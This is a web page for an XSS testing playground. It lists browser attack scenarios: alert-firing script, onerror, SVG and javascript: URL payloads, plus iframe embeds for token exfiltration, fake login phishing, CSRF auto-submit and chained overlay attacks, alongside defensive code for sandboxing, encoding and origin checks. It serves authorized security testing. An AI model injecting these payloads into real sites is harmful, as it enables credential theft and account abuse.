XSS Playground

A set of XSS scenarios you can copy and test as-is

Sangmook Kim

About Sangmook Kim

Frontend Engineer

I am Sangmook Kim, a frontend developer. This site is not a PoC tied to any one product; it is a public playground for anyone to verify the XSS defenses of services they own or are authorized to test.

Each scenario breaks a real browser risk down into a small test page: script tags, event attributes, javascript: URLs, DOM sinks, embedded iframes, parent-page message passing, deceptive UI, and automatic requests.

Copy the HTML payload or iframe code from a scenario card or detail page, paste it into your own project, and check the rendered result and the actual browser behavior.

GitHub

Note. Test only services you are authorized to test. Probing third-party services may violate applicable computer and network laws.

Project intent

XSS protection is not achieved by naming an HTML filter or writing a single filtering rule. You have to confirm in a real browser how far iframes, messages, permission prompts, automatic requests, and deceptive UI can actually go.

This site is not an attack automation tool; it is a checklist that helps developers and security teams reproduce and review rendering policies in services they own or are authorized to test.

Every snippet is meant to be copied into a dev / staging environment. If the HTML payload executes or the iframe scenario runs, that is a signal to investigate; if it is blocked, record which policy did the blocking.

How to use

  1. Open the page for the target scenario.
  2. Copy the HTML payload or iframe code from the card on the home page or from the detail page.
  3. Paste it into your own service (an editor, notes, a wiki, and so on) and save.
  4. Check rendering, sandbox, CSP, postMessage validation, and the actual browser behavior.
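Before pasting a scenario, it helps to know what the embed is allowed to do. The following is an added example, not code from the XSS Playground site: a small audit of the sandbox attribute that applies the one combination rule worth remembering (allow-scripts plus allow-same-origin on same-origin content lets the frame strip its own sandbox) and flags the tokens that widen what a scenario can reach. The origins and element selection are assumptions for illustration.

```javascript
// Added example (not code from the XSS Playground site): audit an embed's
// sandbox attribute before pasting a scenario into it. auditSandbox() is a
// pure function over the attribute value, so it runs outside a browser; the
// loop at the bottom applies it to every <iframe> on the page.

// Tokens whose presence alone widens what a scenario can do.
const RISKY_TOKENS = {
  'allow-top-navigation': 'frame may set top.location without a user gesture',
  'allow-popups-to-escape-sandbox': 'windows opened by the frame are not sandboxed',
  'allow-forms': 'hidden auto-submit forms can POST from the frame',
  'allow-downloads': 'frame can trigger downloads',
  'allow-modals': 'frame can open alert/confirm/prompt dialogs',
};

// sandboxAttr: value of the sandbox attribute, or null when absent.
// frameOrigin / pageOrigin: origins of the embed URL and of the embedding page.
function auditSandbox(sandboxAttr, frameOrigin, pageOrigin) {
  const findings = [];
  if (sandboxAttr === null || sandboxAttr === undefined) {
    findings.push('no sandbox attribute: scripts, forms, popups and storage are all enabled');
    return findings;
  }
  const tokens = new Set(sandboxAttr.toLowerCase().split(/\s+/).filter(Boolean));
  // The combination the HTML spec warns about: same-origin content that can
  // run script can reach parent.document and remove the sandbox attribute.
  if (tokens.has('allow-scripts') && tokens.has('allow-same-origin') && frameOrigin === pageOrigin) {
    findings.push('allow-scripts + allow-same-origin on same-origin content: frame can remove its own sandbox');
  }
  for (const [token, why] of Object.entries(RISKY_TOKENS)) {
    if (tokens.has(token)) findings.push(`${token}: ${why}`);
  }
  return findings;
}

// Browser wiring: report every iframe on the current page. An iframe without
// src (srcdoc) resolves to the page's own origin, which is what the browser does.
function auditPageFrames(doc = document, pageOrigin = location.origin) {
  return Array.from(doc.querySelectorAll('iframe')).map((el) => {
    const src = el.getAttribute('src') || '';
    let frameOrigin = 'invalid';
    try { frameOrigin = new URL(src, pageOrigin).origin; } catch { /* unparsable src */ }
    return { src, findings: auditSandbox(el.getAttribute('sandbox'), frameOrigin, pageOrigin) };
  });
}

if (typeof document !== 'undefined') {
  console.table(auditPageFrames());
}
```

An empty sandbox attribute (`sandbox=""`) is the most restrictive setting and produces no findings; allow-top-navigation-by-user-activation is deliberately not flagged, because the redirect scenario below only fires without a click when the unqualified allow-top-navigation token is present.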

XSS threat map

Following the XSS Playground categories of the Hacker101 CTF and the PortSwigger Web Security Academy guides, the risks that need testing are organized as follows.

Reflected XSS

Data from the current request (query parameters, search terms, error messages) is reflected straight back into the HTML without correct output encoding.

Stored XSS

Saved user input (comments, profiles, document bodies) is later rendered as active content for other users.

DOM-based XSS

Client-side code reads untrusted values such as location, the hash, or postMessage data and writes them into dangerous sinks such as innerHTML or string-argument timers (setTimeout with a string).

Filter / CSP bypass

Event handlers, SVG/MathML, javascript: URLs, encoding tricks, and template syntax can bypass weak blocklists or an incomplete CSP.

Account abuse

Once a script runs, it can issue requests with the user's privileges, manipulate the page, and use any data that user can reach.

Phishing / exfiltration

iframes, overlays, notifications, the clipboard, and postMessage can trick users into entering secrets or send observable information to an external party.

Scenarios

Attack scenarios organized by category. Copy the HTML payload or embed code straight from a card, or open the detail page for deeper testing.

HTML Injection

script tag injection

Check whether a raw script tag executes when user input is parsed as an HTML document.

<script>alert("xss-playground")</script>

Event-handler attribute injection

Check whether on* attributes such as img onerror or details ontoggle survive filtering and execute.

<img src=x onerror="alert('xss-playground')">

SVG / MathML onload payload

Check whether SVG, MathML namespaces, and event attributes bypass weak filters.

<svg onload="alert('xss-playground')" xmlns="http://www.w3.org/2000/svg"></svg>

DOM XSS

DOM innerHTML sink

Check whether location, hash, postMessage, or other untrusted values reach unsafe sinks such as innerHTML. The probe is an img with onerror rather than a script tag because script elements inserted through innerHTML are never executed; a payload that relies on them gives a false negative.

<img src=x onerror="alert('dom-xss')">
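To see the source-to-sink path this scenario exercises, here is an added example (not code from the XSS Playground site) that reads the URL fragment and writes it to innerHTML, next to the output-encoded form. The element id and page URL are assumptions; the renderers are plain functions so the difference can be checked outside a browser.

```javascript
// Added example (not code from the XSS Playground site): source-to-sink trace
// for the DOM innerHTML sink. The renderers are plain functions so they can be
// checked outside a browser; the block at the end wires them to location.hash
// and a hypothetical <div id="greeting"> when run in a page.

// Source: the fragment of the current URL, attacker-controlled and never sent
// to the server, so server-side filtering never sees it.
function readHashSource(href) {
  const i = href.indexOf('#');
  if (i === -1) return '';
  try { return decodeURIComponent(href.slice(i + 1)); } catch { return href.slice(i + 1); }
}

// Vulnerable: the value is concatenated into markup that innerHTML will parse.
function renderGreetingUnsafe(name) {
  return `<p>Hello, ${name}</p>`;
}

// Hardened for an HTML text context: encode the characters that can open a tag,
// close a tag, or break out of an attribute. In real code prefer textContent or
// a templating engine that encodes for you; this shows what the encoding covers.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderGreetingSafe(name) {
  return `<p>Hello, ${escapeHtml(name)}</p>`;
}

// Static oracle for the test: does the markup still contain a script-bearing
// element, or an inline on* handler inside an open tag? In the browser the
// oracle is simply whether onerror fires.
const ACTIVE_MARKUP = /<(script|iframe|object|embed)\b|<[a-z][^>]*\son[a-z]+\s*=/i;
function containsActiveMarkup(html) {
  return ACTIVE_MARKUP.test(html);
}

if (typeof document !== 'undefined') {
  const out = document.getElementById('greeting'); // hypothetical element
  const name = readHashSource(location.href);
  out.innerHTML = renderGreetingUnsafe(name); // #<img src=x onerror=...> fires here
  // Fix for this sink: out.textContent = name;  (no HTML parsing at all)
}
```

Encoding is context-specific: the table above is correct for element text and quoted attribute values, but a value landing in a URL attribute, a script block, or a CSS property needs a different encoder, which is why the sink-appropriate API (textContent here) is the safer default.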

URL / Protocol

javascript: URL protocol

Check whether javascript: remains in URL attributes such as href or action and executes on user interaction.

<a href="javascript:alert('xss-playground')">click me</a>
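The filters this scenario defeats usually match the string "javascript:" before the browser has normalized the value. The following is an added example (not code from the XSS Playground site) of an href allow-list that runs the value through the WHATWG URL parser first, alongside the prefix check it replaces and a set of constructed probes; the base URL is an assumption.

```javascript
// Added example (not code from the XSS Playground site): an href allow-list
// that runs the value through the WHATWG URL parser, so the normalisation the
// browser applies on navigation (tab/newline removal, trimming of leading and
// trailing control characters, scheme case-folding, relative resolution)
// happens before the scheme check. BASE is a hypothetical document URL.

const BASE = 'https://app.example.test/docs/';
const SAFE_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

function isSafeHref(raw, base = BASE) {
  let url;
  try {
    url = new URL(String(raw), base);
  } catch {
    return false; // unparsable input never reaches an attribute
  }
  return SAFE_SCHEMES.has(url.protocol);
}

// What to emit: the normalised absolute URL, or an inert '#' fallback.
function sanitizeHref(raw, base = BASE) {
  return isSafeHref(raw, base) ? new URL(String(raw), base).href : '#';
}

// The prefix check many filters use, kept for comparison. It is bypassed by
// anything the URL parser strips before it matches the scheme.
function naiveHrefCheck(raw) {
  return !String(raw).trimStart().toLowerCase().startsWith('javascript:');
}

// Constructed inputs a filter test should include.
const PROBES = [
  'javascript:alert(1)',
  'JaVaScRiPt:alert(1)',
  'java\tscript:alert(1)',      // ASCII tab inside the scheme
  '\u0001javascript:alert(1)',  // leading C0 control character
  'data:text/html,<script>alert(1)</script>',
  '/profile',
  '//evil.example/landing',     // scheme-relative: passes the scheme check
];

function runProbes() {
  return PROBES.map((p) => ({ probe: p, naive: naiveHrefCheck(p), parsed: isSafeHref(p) }));
}
```

Two caveats the probes make visible. Entity-encoded payloads such as `&#106;avascript:` are decoded by the HTML parser before an attribute value exists, so run the check on the decoded value (the DOM attribute or template variable), not on raw markup. And the scheme-relative probe passes: this check stops script execution, not open redirects, so pair it with a host allow-list when the link must stay on your site.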

Navigation

top.location forced redirect

Navigate the top-level window from inside the iframe. The classic test for the sandbox attribute: a frame sandboxed without allow-top-navigation cannot do this at all, and allow-top-navigation-by-user-activation permits it only after a click inside the frame. Even without sandbox, Chromium-based browsers refuse a cross-origin frame's attempt to navigate top unless the frame has user activation, so a silent redirect from an unsandboxed embed is the stronger finding.

<iframe src="https://xss-playground.com/embed/top-redirect?lang=zh" title="XSS Playground - top.location forced redirect" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>

Communication

postMessage spoofing

Send forged messages to the parent via parent.postMessage. If the parent skips event.origin validation, it can trust attacker-crafted payloads.

<iframe src="https://xss-playground.com/embed/post-message?lang=zh" title="XSS Playground - postMessage spoofing" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>
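What the spoofing scenario is looking for is a parent listener with no origin check. The following is an added example (not code from the XSS Playground site) of the parent-side handler with the three checks such a listener needs, next to the vulnerable shape; the trusted origin, message schema, and element id are assumptions, and dispatch() takes a plain {origin, source, data} object so it can be driven with constructed events.

```javascript
// Added example (not code from the XSS Playground site): the parent-side
// listener that the postMessage spoofing scenario probes. dispatch() is a pure
// function over a {origin, source, data} event so it can be tested with
// constructed messages; the browser wiring at the end is hypothetical.

const TRUSTED_ORIGINS = new Set(['https://widgets.example.test']); // hypothetical embed origin

// Accept one known shape and copy only the validated fields; never eval a
// string or spread the raw object into application state.
function validateMessage(data) {
  if (!data || typeof data !== 'object') return null;
  if (data.type !== 'resize') return null;
  const { height } = data;
  if (!Number.isInteger(height) || height < 0 || height > 4000) return null;
  return { type: 'resize', height };
}

// expectedSource: the embed's contentWindow. The origin check defeats a spoofed
// sender; the source check catches a second frame on a trusted origin; the
// schema check catches a trusted but compromised frame sending junk.
function dispatch(event, expectedSource, trusted = TRUSTED_ORIGINS) {
  if (!trusted.has(event.origin)) return { ok: false, reason: 'origin' };
  if (expectedSource && event.source !== expectedSource) return { ok: false, reason: 'source' };
  const msg = validateMessage(event.data);
  if (!msg) return { ok: false, reason: 'schema' };
  return { ok: true, msg };
}

// The listener the scenario hopes to find: no origin check, data straight into a sink.
function vulnerableHandler(event, sink) {
  sink.innerHTML = event.data.html;
}

if (typeof window !== 'undefined') {
  const frame = document.getElementById('widget'); // hypothetical embed
  window.addEventListener('message', (event) => {
    const result = dispatch(event, frame.contentWindow);
    if (result.ok) frame.style.height = `${result.msg.height}px`;
  });
  // Replies name the target origin; '*' would hand the data to whatever the
  // frame has navigated to since.
  frame.contentWindow.postMessage({ type: 'ready' }, 'https://widgets.example.test');
}
```

The reason for the rejected message is returned rather than thrown so the listener can log it; a burst of 'origin' rejections from an unexpected origin is exactly the side effect the fingerprinting scenario further down tries to provoke.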
Hidden form auto-submit (CSRF-style)

Submit a form to a third-party endpoint without any user interaction. Check that state-changing endpoints require a CSRF token or validate the Origin header rather than relying on the session cookie alone, and note how your cookies' SameSite attribute affects what the cross-site POST carries.

<iframe src="https://xss-playground.com/embed/form-auto-submit?lang=zh" title="XSS Playground - Hidden form auto-submit (CSRF-style)" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>

sendBeacon / fetch exfiltration

Exfiltrate everything observable inside the iframe to an attacker server.

<iframe src="https://xss-playground.com/embed/beacon-exfil?lang=zh" title="XSS Playground - sendBeacon / fetch exfiltration" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>

img tag GET request CSRF

The oldest CSRF: img.src pointed at a state-changing GET endpoint, with cookies attached. With the SameSite=Lax default that Chromium-based browsers apply to cookies lacking an explicit attribute, a cross-site image request arrives without the session cookie; the request itself still goes out, so this scenario shows whether your session cookie is SameSite=None and whether the endpoint accepts GET for writes.

<iframe src="https://xss-playground.com/embed/csrf-image?lang=zh" title="XSS Playground - img tag GET request CSRF" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>

Exfiltration

Parent token / network exfiltration attempts

Multi-angle attempts to extract a JWT, in-flight network traffic, or storage from the parent. See exactly what the same-origin policy blocks and what slips through.

<iframe src="https://xss-playground.com/embed/token-exfil?lang=zh" title="XSS Playground - Parent token / network exfiltration attempts" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>

Phishing

Fake login form (phishing)

Show a form that looks identical to the parent site's login UI and exfiltrate the credentials.

<iframe src="https://xss-playground.com/embed/phishing-form?lang=zh" title="XSS Playground - Fake login form (phishing)" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>

Fullscreen overlay impersonation

Cover the parent page with a fake but pixel-perfect UI rendered inside the iframe.

<iframe src="https://xss-playground.com/embed/fullscreen-overlay?lang=zh" title="XSS Playground - Fullscreen overlay impersonation" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>

Delayed / Chained

Delayed / auto-fire payload

Countdown via URL params, then auto-fire an action. Used to evade immediate user suspicion.

<iframe src="https://xss-playground.com/embed/delayed-attack?lang=zh" title="XSS Playground - Delayed / auto-fire payload" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>

Chained attack (phishing + fullscreen + redirect)

Fullscreen fake UI → credential capture → top redirect to the real site to cover tracks.

<iframe src="https://xss-playground.com/embed/chained-attack?lang=zh" title="XSS Playground - Chained attack (phishing + fullscreen + redirect)" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>

Annoyance

Auto-download trigger

Force a file download without any user click.

<iframe src="https://xss-playground.com/embed/auto-download?lang=zh" title="XSS Playground - Auto-download trigger" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>

popup / window.open spam

Open new windows. Popup blockers drop window.open calls made without a user gesture, and a sandboxed frame needs allow-popups; a popup that gets through is same-origin with the frame that opened it and can host arbitrary phishing UI.

<iframe src="https://xss-playground.com/embed/popup-spam?lang=zh" title="XSS Playground - popup / window.open spam" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>

Autoplay media / forced fullscreen

Autoplay a video with sound, call requestFullscreen, and observe what gets through. Both need a user gesture under current autoplay and fullscreen policies, and fullscreen from an iframe additionally requires allowfullscreen (or a fullscreen permissions policy) on the frame element.

<iframe src="https://xss-playground.com/embed/autoplay-media?lang=zh" title="XSS Playground - Autoplay media / forced fullscreen" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>

Notification permission / push hijack

Trigger Notification.requestPermission so the attacker's origin can push notifications later. Current browsers require a user gesture before showing the prompt, and Chromium does not allow the request from a cross-origin iframe at all; a prompt that appears without either is the finding.

<iframe src="https://xss-playground.com/embed/notification-permission?lang=zh" title="XSS Playground - Notification permission / push hijack" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>

Clipboard hijack

Intercept the copy event and overwrite clipboard contents.

<iframe src="https://xss-playground.com/embed/clipboard-hijack?lang=zh" title="XSS Playground - Clipboard hijack" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>

history.pushState pollution

Push a flood of history entries to break the parent's back-button behavior. Chromium skips entries that were added without user activation when the user presses back, so check whether the entries are actually navigable rather than only counting history.length.

<iframe src="https://xss-playground.com/embed/history-pollution?lang=zh" title="XSS Playground - history.pushState pollution" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>

Probe

Same-Origin Policy probe (what is blocked)

Try to reach parent.document, parent.localStorage, parent cookies — confirm what SOP actually blocks.

<iframe src="https://xss-playground.com/embed/sop-probe?lang=zh" title="XSS Playground - Same-Origin Policy probe (what is blocked)" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>

Parent message-listener fingerprinting

Fire a wide range of postMessage payloads at the parent and observe responses or side effects.

<iframe src="https://xss-playground.com/embed/parent-message-listener-probe?lang=zh" title="XSS Playground - Parent message-listener fingerprinting" width="600" height="420" loading="lazy" referrerpolicy="strict-origin-when-cross-origin"></iframe>

Contributing (Issues / PR)

This project uses a source-available license. The source is public for viewing and contribution, but forking it to deploy, mirror, or run as a commercial service is not permitted.

Ideas, bug reports, translation improvements, and suggestions for new scenarios are welcome. Please discuss the proposal in an Issue first; once it is approved you can be added as a collaborator and create a branch and PR directly in this repository, avoiding long-lived forks.

See LICENSE and CONTRIBUTING.md for the full policy.